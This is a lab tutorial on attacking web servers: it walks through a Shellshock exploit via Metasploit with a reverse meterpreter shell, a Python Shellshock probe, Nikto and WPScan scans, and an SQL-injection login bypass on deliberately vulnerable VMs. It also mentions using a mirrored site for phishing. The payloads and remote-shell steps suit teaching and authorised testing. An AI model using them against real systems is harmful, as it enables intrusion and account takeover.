Injection attacks occur when an attacker supplies input that a web application passes on to a backend system (a database, an operating-system shell, an LDAP directory) as part of a command. The backend cannot tell attacker-controlled data from the command the application meant to send, so the controls in front of the backend are bypassed: the request really does come from the web server, with the web server's own privileges and credentials. The most common form is SQL injection, in which user input is spliced into a database query and changes the query's meaning. Web applications routinely take input from users (a login form, a search box) and use it to compose a database query whose results are sent back to the user; when that input is concatenated into the query text instead of being bound as a parameter, the user can rewrite the query.
HTTrack
HTTrack copies, or "mirrors", a website from the Internet to a local computer. It is available as a standalone download or can be installed in Kali with apt-get:
Open a terminal in Kali > apt-get install webhttrack > type y and press Enter to continue.
After installation, type webhttrack and press Enter; this opens HTTrack's web interface in a browser.
Choose a language > Next.
Type a new project name > Next.
Type the web address (URL) > Next.
Try2hack.nl is a site that may be attacked freely; it consists of challenges or levels in breaking the site.
Leave the default settings > Start.
Click Browse Mirrored Website.
The web pages and files are saved under Home > websites > COPTRY2HACK > www.try2hack.nl
With a local copy you can review the site's HTML and JavaScript offline (only what the server sends to a browser is retrieved; server-side code such as PHP is not), or modify the pages and use the copy for social-engineering attacks (a phishing site that looks like the original).
Web Server (Apache) Attack
I used the Metasploitable2 VM as the target web (Apache) server. The exploit used below is Shellshock (CVE-2014-6271): Apache's mod_cgi passes request headers to a CGI script as environment variables, and an unpatched bash executes code hidden in a header value when it imports those variables. The target therefore needs a bash CGI script under Apache's cgi-bin directory, which I created with nano using echo commands:
msfadmin@metasploitable:~$ cd /usr/lib/cgi-bin
msfadmin@metasploitable:/usr/lib/cgi-bin$ sudo nano web.sh
[sudo] password for msfadmin: <msfadmin>
Type the echo commands, then press Ctrl-X to exit, y to save, and Enter to confirm the file name (or type a new one). Two details matter: the interpreter line must be #!/bin/bash rather than #!/bin/sh, because /bin/sh on this Ubuntu system is dash, which is not affected by Shellshock; and the first two echo lines must print a Content-type header followed by a blank line, otherwise Apache answers with a 500 error ("Premature end of script headers") instead of the script's output.
Make the file executable with chmod:
msfadmin@metasploitable:/usr/lib/cgi-bin$ sudo chmod 755 web.sh
I tested it by opening a browser on my Windows 10 machine and browsing to http://192.168.1.120/cgi-bin/web.sh; the script's output is displayed.
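The request the Metasploit module sends can be reproduced by hand, which is useful for confirming a finding without the framework. The following is an added example, not code from the write-up or from Metasploit: it builds the same kind of User-Agent header the apache_mod_cgi_bash_env_exec module uses (its HEADER option), sends it to the lab script, and tells from the response whether the injected command ran; it also checks a host's own bash the same way. The target URL is the lab's, while the marker string and SAMPLE_CGI (a script of the kind created with nano above; the write-up does not show its exact lines) are this example's assumptions.

```python
"""Shellshock (CVE-2014-6271) probe against a bash CGI script.

Added example, not code from the original write-up or from Metasploit. Assumptions:
LAB_URL (the lab target), the marker string, and SAMPLE_CGI, a script of the kind
created with nano above.
"""
import os
import subprocess
import urllib.request

LAB_URL = "http://192.168.1.120/cgi-bin/web.sh"

# What web.sh needs to look like to be both reachable and exploitable (assumption):
#  - the interpreter is bash, not /bin/sh (dash on Ubuntu, which has no function import);
#  - the first two echo lines emit a Content-type header and a blank line, otherwise
#    Apache answers 500 "Premature end of script headers" instead of showing the output.
SAMPLE_CGI = """#!/bin/bash
echo "Content-type: text/plain"
echo
echo "Hello from $(hostname)"
"""


def shellshock_payload(command: str) -> str:
    """Value for the User-Agent header. mod_cgi exports it as HTTP_USER_AGENT; an
    unpatched bash treats a variable whose value starts with "() {" as an exported
    function and keeps executing whatever follows the closing brace. The two echoes
    push our output past the CGI header block so it shows up in the HTTP body."""
    return "() { :; }; echo; echo; " + command


def is_vulnerable(body: str, marker: str) -> bool:
    """If the marker we asked the target to echo is in the body, the command ran."""
    return marker in body


def probe(url: str = LAB_URL, marker: str = "shellshock-probe-7f3a") -> bool:
    """Send one GET with the crafted User-Agent and classify the response."""
    req = urllib.request.Request(
        url, headers={"User-Agent": shellshock_payload("echo " + marker)})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return is_vulnerable(resp.read().decode("utf-8", errors="replace"), marker)


def local_bash_vulnerable(bash: str = "bash") -> bool:
    """The same bug checked on a host's own bash, no Apache needed: a patched bash
    ignores the crafted variable, an unpatched one prints the marker at startup."""
    env = {"PATH": os.environ.get("PATH", "/usr/bin:/bin"),
           "x": "() { :; }; echo SHELLSHOCK"}
    try:
        out = subprocess.run([bash, "-c", ":"], env=env, capture_output=True,
                             text=True, timeout=5).stdout
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return False
    return "SHELLSHOCK" in out


if __name__ == "__main__":
    print("this host's bash vulnerable:", local_bash_vulnerable())
    print("target vulnerable:", probe())
```

Run probe() against the Metasploitable2 VM and it returns True because the marker comes back in the body; against a patched server the CGI script runs normally and the marker never appears. local_bash_vulnerable() is the quick triage test for any Linux host you can log in to.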
Start the PostgreSQL database that Metasploit uses for its workspace, then launch the Metasploit Framework console.
root@kali:~# service postgresql start
root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...

       =[ metasploit v4.17.11-dev                         ]
+ -- --=[ 1807 exploits - 1028 auxiliary - 313 post       ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
Set the options for the Apache exploit and its payload: LHOST is the attacking Kali machine (192.168.1.110), RHOST is the Metasploitable2 target (192.168.1.120), and TARGETURI is the path of the CGI script created above.

msf > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 192.168.1.110
LHOST => 192.168.1.110
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOST 192.168.1.120
RHOST => 192.168.1.120
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/web.sh
TARGETURI => /cgi-bin/web.sh
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CMD_MAX_LENGTH  2048             yes       CMD max line length
   CVE             CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER          User-Agent       yes       HTTP header to use
   METHOD          GET              yes       HTTP method to use
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           192.168.1.120    yes       The target address
   RPATH           /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /cgi-bin/web.sh  yes       Path to CGI script
   TIMEOUT         5                yes       HTTP read response timeout (seconds)
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.110    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux x86
Launch the exploit against the Metasploitable2 target (192.168.1.120). The module stages the payload through the CGI script and the target connects back to the handler on LHOST:LPORT.

msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit
[*] Started reverse TCP handler on 192.168.1.110:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (861480 bytes) to 192.168.1.120
[*] Meterpreter session 1 opened (192.168.1.110:4444 -> 192.168.1.120:49667) at 2018-10-30 04:53:34 -0400
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    shell         Drop into a system command shell
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS

Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam

Stdapi: Mic Commands
====================

    Command       Description
    -------       -----------
    listen        listen to a saved audio recording via audio player
    mic_list      list all microphone interfaces
    mic_start     start capturing an audio stream from the target mic
    mic_stop      stop capturing audio

Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play an audio file on target system, nothing written on disk
You can gather information about the machine with the commands listed in the help output. It is worth running getuid as well: the session runs as whatever account Apache executes CGI scripts under, which bounds what can be done next without a privilege escalation.
meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 16436
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::

Interface  2
============
Name         : eth0
Hardware MAC : 00:0c:29:fa:dd:2a
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.1.120
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fefa:dd2a
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > shell
Process 30362 created.
Channel 1 created.
pwd
/usr/lib/cgi-bin
ls
php
php5
web.sh
Nikto
Nikto is an open-source (GPL) web server scanner. It runs a large battery of checks against a web server: dangerous files and CGI programs, outdated server software, and configuration issues such as multiple index files, risky HTTP methods and missing security headers, and it tries to identify the web server and application software installed. Its checks come from a database that is updated separately, so run nikto -update before a scan; the "current version" it quotes for an outdated server also comes from that database and can lag the vendor's real releases.
root@kali:~# nikto
- Nikto v2.1.6
---------------------------------------------------------------------------
+ ERROR: No host specified

       -config+            Use this config file
       -Display+           Turn on/off display outputs
       -dbcheck            check database and other key files for syntax errors
       -Format+            save file (-o) format
       -Help               Extended help information
       -host+              target host
       -id+                Host authentication to use, format is id:pass or id:pass:realm
       -list-plugins       List all available plugins
       -output+            Write output to this file
       -nossl              Disables using SSL
       -no404              Disables 404 checks
       -Plugins+           List of plugins to run (default: ALL)
       -port+              Port to use (default 80)
       -root+              Prepend root value to all requests, format is /directory
       -ssl                Force ssl mode on port
       -Tuning+            Scan tuning
       -timeout+           Timeout for requests (default 10 seconds)
       -update             Update databases and plugins from CIRT.net
       -Version            Print plugin and database versions
       -vhost+             Virtual host (for Host header)
   + requires a value

       Note: This is the short help output. Use -H for full help text.
Scan the Metasploitable2 VM:

root@kali:~# nikto -host 192.168.1.120
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.120
+ Target Hostname:    192.168.1.120
+ Target Port:        80
+ Start Time:         2018-11-05 22:32:52 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output from the phpinfo() function was found.
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server leaks inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 92462, size: 40540, mtime: Tue Dec 9 12:24:00 2008
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /test/: Directory indexing found.
+ OSVDB-3092: /test/: This might be interesting...
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: Output from the phpinfo() function was found.
+ /phpinfo.php?cx[]=[...]<script>alert(foo)</script>: Output from the phpinfo() function was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpMyAdmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8347 requests: 0 error(s) and 29 item(s) reported on remote host
+ End Time:           2018-11-05 22:33:23 (GMT-5) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
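Several of the findings above come straight from response headers, and it helps to see what the scanner is actually testing for. The following is an added example, not Nikto's code or the write-up's: it re-implements those header checks (missing X-Frame-Options, X-XSS-Protection and X-Content-Type-Options; version disclosure in Server and X-Powered-By; the default Apache ETag that leaks inode and size; TRACE enabled) over a constructed header set modelled on the scan output, and runs the same checks over a hardened set. SAMPLE_HEADERS and HARDENED_HEADERS are made up for this example, and the TRACE check reads an OPTIONS response's Allow header rather than sending a TRACE request as Nikto does.

```python
"""Response-header audit behind several of the Nikto findings above.

Added example, not Nikto's code or the write-up's. SAMPLE_HEADERS and HARDENED_HEADERS
are constructed; the ETag mtime field is a placeholder.
"""
import re

# Constructed to mirror the scan: Apache 2.2.8 banner, PHP version header, and the default
# Apache ETag "inode-size-mtime" in hex (0x1692e = 92462, 0x9e5c = 40540, as Nikto printed).
SAMPLE_HEADERS = {
    "Server": "Apache/2.2.8 (Ubuntu) DAV/2",
    "X-Powered-By": "PHP/5.2.4-2ubuntu5.10",
    "ETag": '"1692e-9e5c-45dc9e6bb3a00"',
    "Allow": "GET,HEAD,POST,OPTIONS,TRACE",
    "Content-Type": "text/html",
}

# What the same server should send after hardening (constructed), with the Apache
# directive that produces each change.
HARDENED_HEADERS = {
    "Server": "Apache",                          # ServerTokens Prod
    "X-Frame-Options": "DENY",
    "X-Content-Type-Options": "nosniff",
    "X-XSS-Protection": "1; mode=block",         # legacy header; CSP is the real XSS control
    "Content-Security-Policy": "default-src 'self'",
    "ETag": '"9e5c-45dc9e6bb3a00"',               # FileETag MTime Size (inode dropped)
    "Allow": "GET,HEAD,POST,OPTIONS",            # TraceEnable off
    "Content-Type": "text/html",
}

EXPECTED_HEADERS = ("X-Frame-Options", "X-Content-Type-Options", "X-XSS-Protection")
APACHE_ETAG = re.compile(r'^"?([0-9a-f]+)-([0-9a-f]+)-([0-9a-f]+)"?$')  # inode-size-mtime
VERSION_IN_BANNER = re.compile(r"/\d+(\.\d+)+")


def audit_headers(headers: dict) -> list:
    """Return human-readable findings for one response's headers; [] means clean."""
    h = {k.lower(): v for k, v in headers.items()}   # header names are case-insensitive
    findings = []
    for name in EXPECTED_HEADERS:
        if name.lower() not in h:
            findings.append("missing " + name)
    if VERSION_IN_BANNER.search(h.get("server", "")):
        findings.append("Server banner discloses version: " + h["server"])
    if "x-powered-by" in h:
        findings.append("X-Powered-By discloses " + h["x-powered-by"])
    m = APACHE_ETAG.match(h.get("etag", ""))
    if m:   # three hex fields is Apache's default FileETag INode MTime Size
        inode, size = int(m.group(1), 16), int(m.group(2), 16)
        findings.append("ETag leaks inode %d, size %d" % (inode, size))
    methods = [v.strip().lower() for v in h.get("allow", "").split(",")]
    if "trace" in methods:
        findings.append("TRACE method allowed (cross-site tracing)")
    return findings


if __name__ == "__main__":
    for finding in audit_headers(SAMPLE_HEADERS):
        print("+", finding)
    print("hardened:", audit_headers(HARDENED_HEADERS))
```

The inode decode is the point of the ETag check: Nikto's "inode: 92462, size: 40540" is simply the first two hex fields of the ETag converted to decimal, which is why the fix is to remove INode from FileETag rather than to hide the header.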
OWASP Broken Web Application (BWA)
The OWASP Broken Web Applications Project is a collection of deliberately vulnerable web applications distributed as a virtual machine.
Download and extract the OWASP Broken Web Applications VM and double-click the VMware configuration file (the 2 KB .vmx file) to register it.
Right-click the VM > Settings > Network Adapter > Custom: Specific virtual network > VMnet0. VMnet0 is VMware's bridged network, so the VM sits on the same LAN as the physical hosts; because every application on it is intentionally exploitable, keep it on a lab network that nothing you care about can reach, or use a host-only network instead.
I renamed the VM to BWAPP. Click Power On (the green arrow). Log in as root / owaspbwa (the credentials are displayed on the console).
I changed the BWAPP VM's IP address to 192.168.1.140/24 with: ifconfig eth0 192.168.1.140 netmask 255.255.255.0
From the Windows 7 machine, browse to http://192.168.1.140/ and click OWASP Mutillidae II.
Hover over OWASP 2013 > A1 - Injection (SQL) > SQLi - Bypass Authentication > Login.
To view hints on performing the SQL injection, click Toggle Hints > Authentication Bypass.
In the Username field type:  ' 'a' = 'a' --  (note the space after the --; MySQL only treats -- as a comment when it is followed by whitespace, so without it the query fails instead of bypassing the password check). Click Login.
Notice that the status changes to User Authenticated and the page shows Logged In Admin: admin.
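The bypass works because the login code builds its SQL by string concatenation, as described in the injection introduction at the top of this page. The following is an added example, not code from the write-up or from Mutillidae: it reproduces the authentication bypass against an in-memory SQLite table so it runs offline, puts the vulnerable query beside the parameterised one that defeats it, and includes the single-quote probe a tester sends first. The accounts table, its rows and the BYPASS payload (a standard OR-tautology rather than the exact string typed above) are constructed for this example.

```python
"""Authentication-bypass SQL injection: vulnerable query beside the fixed one.

Added example, not code from the original write-up or from Mutillidae. The accounts
table, SEED_USERS and BYPASS are constructed for this example.
"""
import sqlite3

# Constructed stand-in for the application's accounts table.
SEED_USERS = [("admin", "adminpass"), ("jeremy", "password")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", SEED_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """What the bypassable login does: user input is concatenated into the SQL text,
    so a quote in the input ends the string literal and the rest is parsed as SQL.
    Returns the username of the first matching row ("logged in" as that account)."""
    sql = ("SELECT username FROM accounts WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same lookup with bound parameters: the input is data to the driver, never SQL."""
    row = conn.execute(
        "SELECT username FROM accounts WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def quote_probe(conn) -> bool:
    """The first thing a tester tries: does a lone quote break the query? A database
    error here is the signal that input reaches the SQL parser unescaped."""
    try:
        login_vulnerable(conn, "'", "x")
    except sqlite3.OperationalError:
        return True
    return False


# Close the string literal, OR in a tautology, comment out the password check.
# The query becomes:  ... WHERE username = '' OR 'a'='a' -- ' AND password = '...'
# so every row matches and the first one (admin) is returned. The space after --
# is what MySQL (Mutillidae's backend) requires for -- to start a comment.
BYPASS = "' OR 'a'='a' -- "


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login as:", login_vulnerable(db, BYPASS, "whatever"))  # admin
    print("safe login as:", login_safe(db, BYPASS, "whatever"))              # None
```

With the parameterised version the same payload is looked up literally as a username and matches nothing; the probe returns no error either, which is the behaviour a scanner should see on a fixed login form.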
WordPress Scan (WPScan)
WPScan is a black-box WordPress vulnerability scanner, free for non-commercial use, written for security professionals and blog maintainers to test the security of their sites.
root@kali:~# wpscan
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
Examples :

-Further help ...
wpscan --help

-Do 'non-intrusive' checks ...
wpscan --url www.example.com

-Do wordlist password brute force on enumerated users using 50 threads ...
wpscan --url www.example.com --wordlist darkc0de.lst --threads 50

-Do wordlist password brute force on the 'admin' username only ...
wpscan --url www.example.com --wordlist darkc0de.lst --username admin

-Enumerate installed plugins ...
wpscan --url www.example.com --enumerate p

-Enumerate installed themes ...
wpscan --url www.example.com --enumerate t

-Enumerate users (from 1 - 10)...
wpscan --url www.example.com --enumerate u

-Enumerate users (from 1 - 20)...
ruby wpscan --url www.example.com --enumerate u[1-20]

-Enumerate installed timthumbs ...
wpscan --url www.example.com --enumerate tt

-Use a HTTP proxy ...
wpscan --url www.example.com --proxy 127.0.0.1:8118

-Use a SOCKS5 proxy ... (cURL >= v7.21.7 needed)
wpscan --url www.example.com --proxy socks5://127.0.0.1:9000

-Use custom content directory ...
wpscan -u www.example.com --wp-content-dir custom-content

-Use custom plugins directory ...
wpscan -u www.example.com --wp-plugins-dir wp-content/custom-plugins

-Update the Database ...
wpscan --update

-Debug output ...
wpscan --url www.example.com --debug-output 2>debug.log

See README for further information.

[!] No argument supplied
[i] It seems like you have not updated the database for some time
[?] Do you want to update now? [Y]es [N]o [A]bort update, default: [N] > y
[i] Updating the Database ...
[i] Update completed
root@kali:~# wpscan --url http://localhost
[!] The remote website is up, but does not seem to be running WordPress. If you are sure, use --force
[+] URL: http://localhost/
[+] Started: Mon Nov 5 21:30:26 2018

[+] Interesting header: SERVER: Apache/2.4.35 (Debian)
[!] Upload directory has directory listing enabled: http://localhost/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://localhost/wp-includes/

[+] Enumerating WordPress version ...

[+] WordPress version 4.9.8 (Released on 2018-08-02) identified from advanced fingerprinting

[+] Enumerating installed plugins (only ones marked as popular) ...

   Time: 00:00:01 <==================================> (1494 / 1494) 100.00% Time: 00:00:01

[+] We found 1 plugin:

[+] Name: akismet - v4.0.8
 |  Latest version: 4.0.8 (up to date)
 |  Last updated: 2018-10-30T16:34:00.000Z

[+] Finished: Mon Nov 5 21:30:32 2018
[+] Elapsed time: 00:00:06
[+] Requests made: 1558
[+] Memory used: 70.914 MB